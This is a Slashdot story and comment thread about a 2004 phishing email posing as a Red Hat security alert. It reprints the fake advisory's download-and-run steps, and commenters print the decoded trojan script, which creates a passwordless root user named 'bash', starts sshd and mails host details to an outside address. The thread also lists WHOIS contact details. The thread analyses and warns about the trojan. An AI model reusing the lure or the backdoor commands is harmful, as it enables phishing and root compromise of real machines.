Beware 'Fedora-Redhat' Fake Security Alert

rixdaffy writes "I just received an email from the 'Redhat Security Team' telling me that I needed to download some tar file from fedora-redhat.com. Besides the fact that I don't use Red Hat/Fedora, I immediately smelled something fishy. Maybe it's not the first trojan targeted at Linux users, but together with the official sounding domain, it could trick some users into downloading and running the binary. It looks like Red Hat is already aware of the issue." According to Red Hat's page, "These emails tell users to download and run an update from a users home directory. This fake update appears to contain malicious code." Update: 10/25 01:32 GMT by T : One borked link, unborked.

text of site

Original issue date: October 20, 2004
Last revised: October 20, 2004
Source: RedHat

A complete revision history is at the end of this file.

Redhat found a vulnerability in fileutils (ls and mkdir), that could allow a remote attacker to execute arbitrary code with root privileges. Some of the affected linux distributions include RedHat 7.2, RedHat 7.3, RedHat 8.0, RedHat 9.0, Fedora CORE 1, Fedora CORE 2 and not only. It is known that *BSD and Solaris platforms are NOT affected.

The RedHat Security Team strongly advises you to immediately apply the fileutils-1.0.6 patch. This is a critical-critical update that you must make by following these steps:

* First download the patch from the Stanford RedHat mirror: wget www.fedora-redhat.com/fileutils-1.0.6.patch.tar.gz or directly here.
* Untar the patch: tar zxvf fileutils-1.0.6.patch.tar.gz
* cd fileutils-1.0.6.patch
* make
* ./inst

Anybody running RedHat and Fedora are strongly adviced to apply this patch! Read more about this vulnerability at www.redhat.com or www.fedora.redhat.com

Thank you for your prompt attention to this serious matter,

RedHat Security Team.

Copyright © 2004 Red Hat, Inc. All rights reserved.

Re:text of site

[Seehund]

Actually, the exploit indeed seems to use RPM. The archive includes a .bin file, which in reality is an RPM.

drwxr-xr-x root/wheel 0 2004-10-23 21:09:09 fileutils-1.0.6.patch/
-rw-r--r-- root/wheel 32 2004-10-23 02:59:42 fileutils-1.0.6.patch/Makefile
-rw-r--r-- root/wheel 14297 2004-10-23 18:02:12 fileutils-1.0.6.patch/inst.c
-rw-r--r-- root/wheel 990084 2004-10-23 21:06:48 fileutils-1.0.6.patch/fileutils-patch.bin

But I see what you mean.

Also, a simple thing such as that this time you're not recommended to simply start up2date or yum to get updates as usual really should set off some alarms in people's minds. And that fedora-redhat.com is not and has never been used by Fedora or Red Hat. And so on.

I doubt that many fell for this.

Re:text of site

[justforaday]

Thanks for posting that! Whew, I sure am glad I managed to get that patch installed before anyone was able to take over my system...

Re:text of site

[MBCook]

Anyone who reads this and isn't instantly suspicious needs to up their paranoia level. Look at all the mistakes in the grammar! "Redhat found...". If this was from RedHat it would be "Redhat has found" or "We found" or "It has come to our attention" or something like that. "Some of the effected distriubtions include..." should be something more like "RedHat 7.2 and newer are effected" or some such. It would not end in "and not only" (which is terrible English, probably supposed to be "and more"). Plus why would a RedHat security advisory inform people if Solaris or *BSD was effected? I would expect that a link would be given to more information about the vulnerability (not just "see redhat.com" which is basically what's there). Last but not least, what has been RedHat all thoughout the advisory becomes "Red Hat" in the last line.

Beyond those obvious problems, the "best" targets of something like this (businesses) would have people who know better than this. Those people would know how a patch file would work. At miniumum the "./inst" section should say "make install", which is much more common. So this would only effect the "newbie" Linux user. Last of all, I would expect that anything RedHat issued would say something like "or get the update through Red Carpet (or whatever their 'Windows Update' is called)".

This isn't a very well made forgery. They could have easily taken a true RedHat advisory and modified it so the language would be better and sound more plausable. They could have at LEAST gotten someone who knows English better.

Does anyone else find it strange someone would go through all the trouble of registering a domain-name to run this scam? Why not say "download it off the (such and such) mirror at ftp://120.584.391.568/pub/mirror/redhat/patches/pa tch_file.tar.gz" or something like that. Use any domain name and make it look like a mirror. When was the last time any company put a file for users at "(domainname).com/file.tar.gz"? Never.

Most people could have done better, IMHO.

Re:text of site

[WindBourne]

It is a little root kit.

/bin/chgrp
/bin/chmod
/bin/chown
/bin/cp
/bin/ dd
/bin/df
/bin/link
/bin/ln
/bin/ls
/bin/mkd ir
/bin/mknod
/bin/mv
/bin/rm
/bin/rmdir
/bin /sync
/bin/touch
/bin/unlink
/etc/DIR_COLORS
/ etc/DIR_COLORS.xterm
/etc/profile.d
/etc/profile .d/colorls.csh
/etc/profile.d/colorls.sh
/usr/bi n/dir
/usr/bin/dircolors
/usr/bin/du
/usr/bin/i nstall
/usr/bin/mkfifo
/usr/bin/shred
/usr/bin/ vdir
...

And there is more, but hey....

We knew this day would come

[Orgazmus]

Adopting dumb users had to bring the ones exploiting the stpidity with them. Even tho running as a non-admin should help againts these things, there is no cure against security holes between the chair and the keyboard.

Re:We knew this day would come

[Stevyn]

I wouldn't worry, they're probably on the forums trying to find the command to install it.

Re:We knew this day would come

[antoy]

Yes, but when this kind of thing happened on Windows, it was Windows' fault for not having the proper security mechanisms to stop it. The difference is that Windows will set up all users as administrators, true, but running as a plain user can be very bad too. The fact is, neither of the OSes provides (by default, at least) substantial protection from such attacks.

Allowing only registered executables to run could be set up to prevent such things. Microsoft signs their patches and programs too, but no regular user will ever check.

Incorporate such functions in the OS or GUI. Harass the user whenever an executable or shared library is introduced to the system: "Here are the certifications, do you trust this?"

Limiting permissions up to the user level is not enough anymore: VM based environments such as Java and .NET have program/assembly-based security systems. But although the technology exists, it is very poorly handled, at least in the .NET front where I am experienced: There is no simple wizard to set up settings the way you want them, there is no popup dialog asking you how much you trust this executable and which permissions it should get. Such technology could go a long way in preventing such ridiculously simple attacks from succeeding in the future.

First time I saw a similar feature was in Kerio Personal Firewall, which would ask everytime a new program would attempt to connect somewhere, or have something connect to a port it opened. It was simple and effective, and the 'harassment' was more than worth it (SP2 does something similar, but it's flawed*).

In conclusion. I want to say that I believe if all people had:

1) Startup Monitor - Painfully simple, no one should be without it.
2) Kerio Personal Firewall, or equivalent
3) An executable monitor as described above.
,the *real* reasons for Windows' pathetic security record would be no more. Never mind those vulnerabilities: I could give you a .exe that would delete all your documents, and you have but to click on it (I swear it decrypts HL2 from the Steam files :-) The same, of course, applies to Linux.


* SP2 tells you when an executable tries to connect, and waits for you to decide if you want to block it, but it *does* allow the connection to work until you decide what to do with it. Furthermore, I'm not sure if it can tell if an executable was replaced with a compromised version (Kerio has MD5 hashes)

Re:We knew this day would come

[fucksl4shd0t]

And allowing only registered executables to run is a bad thing. Who should decide?

On my computer, I should decide, and the registration dealie should provide me with the information I need to make the decision.

The two parts of Microsoft's weird DRM thing I disagree with (with regards to running executables) are that the key is inaccessible to me, stashed somewhere in the BIOS, and that Microsoft is the one who decides what is safe and what isn't.

About Time

[Mr.+Arbusto]

It's fishing, it happens on every platform and requires the user to do something they think is in their best interest. Nothing new.

I'll try it...

[enginuitor]

I am downloading the file to a Knoppix box, and will then disconnect the ethernet cord, run the code, and report back.

Stay tuned.

Re:I'll try it...

[damiam]

Make sure you use a chroot jail; Knoppix can still write to your hard drive.

Re:I'll try it...

[busonerd]

[apologies for replying to myself]

The makefile compiles an application called inst that seems to have been created with the shc script compiler.. its rather obfuscated.. attempting to reverse engineer now

Re:I'll try it...

[eakerin]

Well I downloaded it, and uncompressed it.

There are 3 files:
fileutils-patch.bin
inst.c
Makefile

fileutils-patch.bin is an rpm with an incorrect extension, but it's valid. And an actual RPM from redhat (verified the GPG signature) Probably just put there to make it look bigger, and have something that came from redhat.

Well I was gonna put the package header information here, but slashcode didn't like it.

Signature verification using "rpm --checksig fileutils-patch.bin"

fileutils-patch.bin: (sha1) dsa sha1 md5 gpg OK

Re:I'll try it...

[superpeach]

I just looked at inst.c and changed it a bit to print what it runs instead of running it. Looks like a shell script hidden in some C (using shc, http://www.datsi.fi.upm.es/~frosal/sources/shc.htm l )

The working bit of the script is:

echo "Inca un root frate belea: " >> /tmp/mama
adduser -g 0 -u 0 -o bash >> /tmp/mama
passwd -d bash >> /tmp/mama
ifconfig >> /tmp/mama
uname -a >> /tmp/mama
uptime >> /tmp/mama
sshd >> /tmp/mama
echo "user bash stii tu" >> /tmp/mama
cat /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null
rm -rf /tmp/mama

So, adds a user called bash with root privs, starts sshd and emails your IP address to someone.

Re:I'll try it...

[aredubya74]

Assuming (yeah, I know, big assumption) the whois info is relatively accurate, we may have an idea as to at least next step in the chain of figuring out the culprit, output of whois addlebrain.com:

Registration Service Provided By: StoreIQ, Inc.
Contact: technical@storeiq.com
Visit:

Domain name: addlebrain.com

Registrant Contact:
ABM Wireless
Domain Administrator (administrator@buywirelessdirect.com)
+1.7323331100
Fax: +1.NA
3587 US Highway 9 #132
Freehold, NJ 07728
US

Administrative Contact:
ABM Wireless
Domain Administrator (administrator@buywirelessdirect.com)
+1.7323331100
Fax: +1.NA
3587 US Highway 9 #132
Freehold, NJ 07728
US

Technical Contact:
ABM Wireless
Domain Administrator (administrator@buywirelessdirect.com)
+1.7323331100
Fax: +1.NA
3587 US Highway 9 #132
Freehold, NJ 07728
US

Billing Contact:
ABM Wireless
Domain Administrator (administrator@buywirelessdirect.com)
+1.7323331100
Fax: +1.NA
3587 US Highway 9 #132
Freehold, NJ 07728
US

Status: Locked

Name Servers:
dns1.name-services.com
dns2.name-services.com
dns3.name-services.com
dns4.name-services.com
dns5.name-services.com

The same address is used for two associated domains, buywirelessdirect.com (the email addy for this domain's tech contact) and storeiq.com (the email addy for buywirelessdirect.com's tech contact). The area code is accurate for that neck of the woods too, though I haven't tried the phone number (yet):

StoreIQ, Inc.
John Thompson (technical@storeiq.com)
+1.7323331145
Fax:
3587 US Highway 9 #213
Freehold, NJ 07728
US

Here's what WHOIS says:

[SIGBUS]

[Querying whois.internic.net]
[Redirected to whois.melbourneit.com]
[Querying whois.melbourneit.com]
[whois.melbourneit.com]

Domain Name.......... fedora-redhat.com
Creation Date........ 2004-10-24
Registration Date.... 2004-10-24
Expiry Date.......... 2005-10-24
Organisation Name.... Raymond Jackson
Organisation Address. 224 Cedar Avenue
Organisation Address.
Organisation Address. New York
Organisation Address. 95301
Organisation Address. NY
Organisation Address. UNITED STATES

Admin Name........... Raymond Jackson
Admin Address........ 224 Cedar Avenue
Admin Address........
Admin Address........ New York
Admin Address........ 95301
Admin Address........ NY
Admin Address........ UNITED STATES
Admin Email.......... rayjackson23@yahoo.com
Admin Phone.......... +1.2098994533
Admin Fax............

Tech Name............ YahooDomains TechContact
Tech Address......... 701 First Ave.
Tech Address.........
Tech Address......... Sunnyvale
Tech Address......... 94089
Tech Address......... CA
Tech Address......... UNITED STATES
Tech Email........... domain.tech@YAHOO-INC.COM
Tech Phone........... +1.6198813096
Tech Fax............. +1.6198813010
Name Server.......... yns1.yahoo.com
Name Server.......... yns2.yahoo.com

Re:Here's what WHOIS says:

Don't forget the domain that the script emails, root@addlebrain.com

Sorry to dissapoint you, but I doubt he owns the domain - they offer free webmail, so it's likely he just signed up for an account. Presumably they didn't stop anyone from getting the username 'root' - I signed up for 'administrator' just now (password 'monkey' if you don't believe me) with no problems.

Real link?

[chrispyman]

Why not just use the real link and slashdot their site into oblivion!

Stupid Tricks?

[dj_cel]

It seems to me that most people using any version of Linux will not fall victim to these sorts of things. I would expect something like this to work for the majority of windows users, but as the audience of Linux is mostly tech-savy, I can't see this becoming a problem. The problem is going to be when larger groups of desktop users make the jump to Linux. What can be done to prevent this from happening in the future? What failsafes can be built into Linux to prevent people with less than average pc skills from destroying their systems?

Re:Stupid Tricks?

[Rie+Beam]

"What can be done to prevent this from happening in the future? What failsafes can be built into Linux to prevent people with less than average pc skills from destroying their systems?"

No monitor.

Surprisingly

[Mentorix]

Running untrusted code can result in system compromise.

Everyone checks the gpg signatures right?

Re:I wonder...

[Forezt]

or better yet, it Microsoft paid the Yankee group to do it for them, and then do an "independent study" on it.

Re: text

[Inf0phreak]

Why post the text instead of having the /. crowd flood their server to see what they've put up there? Potentially that could bring the server offline and cost them a bundle for a great two-sided effect (OK, the latter is not that cool if it's just some rooted box, but at least it would prevent anyone being affected if it was /.'ed to hell).

PHEW!

[big+daddy+kane]

I'm sure glad I'm using windows!

Re: I'll try it... Execution results!

[enginuitor]

Identifying the system. This may take up to 2 minutes. Please wait...
adduser: No more than two names.
passwd: Unknown user bash
Could not load host key: /etc/ssh/ssh_host_key
Could not load host key: /etc/ssh/ssh_host_rsa_key
Could not load host key: /etc/ssh/ssh_host_dsa_key
Disabling protocol version 1. Could not load host key.
Disabling protocol version 2. Could not load host key.
sshd: no hostkeys available -- exiting.
System looks OK. Proceeding to next step.

Patching "ls": ###########
Patching "mkdir": ##########

System updated and secured successfully. You may erase these files.

Linux - Where the malware comes with the source

[cranos]

Dammit why does Linux have to be so complicated, I mean damn you have to compile your own viruses and everything!!!!

Re:Linux - Where the malware comes with the source

[/dev/trash]

You think you have it bad? I run Gentoo. I'm still compiling all the files needed for this one to run.

Re:Finally...

[Fapestniegd]

Debian has been weeding out incompetent users with its "impossible to use" installer for years.

It keeps the "Mandrake Crew" off of the debian-users lists.

Use SPF to protect yourself from phishing

[taubz]

If your mail client checked From: addresses against SPF records in DNS, you'd know immediately this was a hoax. Redhat.com fortunately publishes SPF records and -- score one for SPF -- they can be used to identify with 100% accuracy that the mail is not legitimate.

How can you get your mail client to check SPF records automatically? Download the Thunderbird SPF Extension.

(Disclosure: I wrote the plugin. :) )

Coding 0, Grammar 0.

[monoi]

Anybody running RedHat and Fedora are strongly adviced to apply this patch!

But I am running SUSE! Am I adviced in similar fashion? Perhaps I too should applying patch lest SUSE found vulnerability also? Thankyou to www.fedora-redhat.com for adviced me in this helpful manner against remote attackers!

Re: I'll try it... Execution results!

[enginuitor]

It would appear that the author of this code was a bit foolish. The code appears to try to add a user, then start an sshd backdoor, all during the time that it's supposedly "Identifying the system". But it fails and spits out a bunch of errors! I will post the code shortly.

Christ, they didn't do a very good job...

[Nailer]

The domain name was a good start, but these kids will have a hard time fooling anyone since they've ignored most of the basics:

• Most users who install security upgrades won't be running Red Hat 7.x.
  
• Red Hat is two words. Both begin with capitals.
  
• Red Hat use packages. Not hard guys.
  
• Security updates are provided through up2date. If they were smart, they would have provided an up2date source to use.
  
• The exclamation marks in 'Apply this patch!' seem a little un vendor-like
  

Re:Christ, they didn't do a very good job...

[frankthechicken]

This was version 0.1 of the trojan, and is not yet ready for public release. With helpful contributions like your, we hope to use the "many eyes" approach, in keeping with the OSS philosophy, to form a complete and fully featured trojan.

Thus we would like to thank you for your generous time in helping this valuable project reach its full potential.

You may also like to take note of our web site www.bugzilla-Fedora-Redhat.com, where we have set up a forum dedicated to improving our product.

Contents of inst.c...

[enginuitor]

I've tried to post the code here, but am repeatedly blocked by the Lameness Filter. I have posted the C file to my server. It's safe to view, as long as you don't go trying to compile and run it! :-p
View inst.c

Re:Contents of inst.c...

[nomadic]

It's safe to view, as long as you don't go trying to compile and run it! :-p

Hey, stop trying to deny my GPL rights you Windows-loving tyrant!

Re: I'll try it... Execution results!

[Student_Tech]

From the top of that inst.c file:

#if 0
shc Version 3.7, Generic Script Compiler
Copyright (c) 1994-2003 Francisco Rosales

shc -v -r -T -f redhat
#endif

From shc's manpage:

shc's main purpose is to protect your shell scripts from modification or inspection. You can use it if you wish to distribute your scripts but don't want them to be easily readable by other people.

Definitly doing something then, at least viewing the parent post.

Re: I'll try it... Execution results!

[Smitedogg]

Here is what it does.

Dogg

I'm retarded

[Cid+Highwind]

Looks like I misinterpreted the code. The rc4 stuff is part of the shc "script compiler" output that decodes the actual shell script. fileutils-patch.bin is just a mis-named redhat RPM that inst doesn't appear to use at all.

Re:I'm retarded

[busonerd]

Preliminary analysis of inst.c: Decrypts a whole bunch of stuff (not sure where it all goes yet) and then splits off to /bin/sh with a command line of: /bin/sh -c exec './inst' "$@" ./inst

Re: I'll try it... Execution results!

[MbM]

The script is encoded into the text variable in the source. The key part of the script is this:

echo "Inca un root frate belea: " >> /tmp/mama
adduser -g 0 -u 0 -o bash >> /tmp/mama
passwd -d bash >> /tmp/mama
ifconfig >> /tmp/mama
uname -a >> /tmp/mama
uptime >> /tmp/mama
sshd >> /tmp/mama
echo "user bash stii tu" >> /tmp/mama
cat /tmp/mama | mail -s "Inca o roata" root@addlebrain.com >> /dev/null
rm -rf /tmp/mama

(I'd post the whole script but the lameness filter won't let me)

Create a user named bash, no password
grab the ip and uptime, start ssh
mail the results

contact yahoo

Everyone should email yahoo via netblockadmin@yahoo-inc.com and ask them to take the site down.

Checksum

[jesser]

>md5sum fileutils-1.0.6.patch.tar.gz

68349c219d941209af8f7c968b89d622 *fileutils-1.0.6.patch.tar.gz

So you can be sure you're getting the real fake patch.

Re: text (Why? Because.)

[turnstyle]

Why post the text instead of having the /. crowd flood their server to see what they've put up there?

Because sending loads of traffic to a site that is actively trying to get a trojan onto unsuspecting boxes seems like a pretty bad idea.

Apart from those that might click through without bothering to RTFA, and mistakenly think that it's a legit patch, there are also all those browser exploits (such as the Microsoft jpeg exploit) that could also be waiting on the site for unpatched systems.

Probabilities:

[reality-bytes]

If the Antivirus companies were responsible, they'd have done a better job.

If Microsoft was responsible, they wouldn't have included any source code.

If SCO was responsible, they'd have included sourcecode and then sued you for running it

All things taken into consideration, I'm with 'other' on this one ;)

I love it!

[jd]

Linux geek comes across an obvious trojan. What does said geek do? E-mail the site admin? DoS the source site? Noooooo. They set up a sandbox environment and run it, to see what happens!

(Mind you, I'm no better. First time I got a computer virus, when I was running MSDOS, my first reaction was to run a binary diff against a clean version of the file, and disassemble the result to see what it did. Do you know if there's a cure for this?)

Re: I'll try it... Execution results!

[labratuk]

Surely we just have to send a load of bogus reports to root@addlebrain.com and he'll have a fun time trying to find the genuine ones.

Re:bastards

[vsync64]

Red Hat should simply rename the file on their site, change the links to it, and then replace it with a "THIS IS FRAUD" PNG.

Re: I'll try it... Execution results!

[schon]

Surely we just have to send a load of bogus reports to root@addlebrain.com and he'll have a fun time trying to find the genuine ones.

If you do, make sure the IP addresses are of .mil and .gov sites. :o)

Re: text (Why? Because.)

[Feanturi]

without bothering to RTFA, and mistakenly think that it's a legit patch,

Though it's a shitty thing for someone to be doing, as it is anytime somebody tries to get a virus or exploit going, it is at the same time a very amusing example of one. Think about it, the concept of this one has a certain beauty: It is meant to be activated while the machine is under the control of someone who should know better. There is no clueless-luser-carelessly-clicking that can be done here, you've got to know some basic geek stuff to go get the 'patch', unpack it, install it.. You've got to expend a reasonable amount of effort to get nailed by this thing. That is both its curse and its beauty.

Re: text (Why? Because.)

[Thing+1]

This is an honor virus. Please forward to all your friends, then format your hard drive(s). Thank you.

Re: text (Why? Because.)

[Stephen+Samuel]

This is a buggy honor virus. Please format your hard drive(s) and then pass it to all your friends.
Thank you.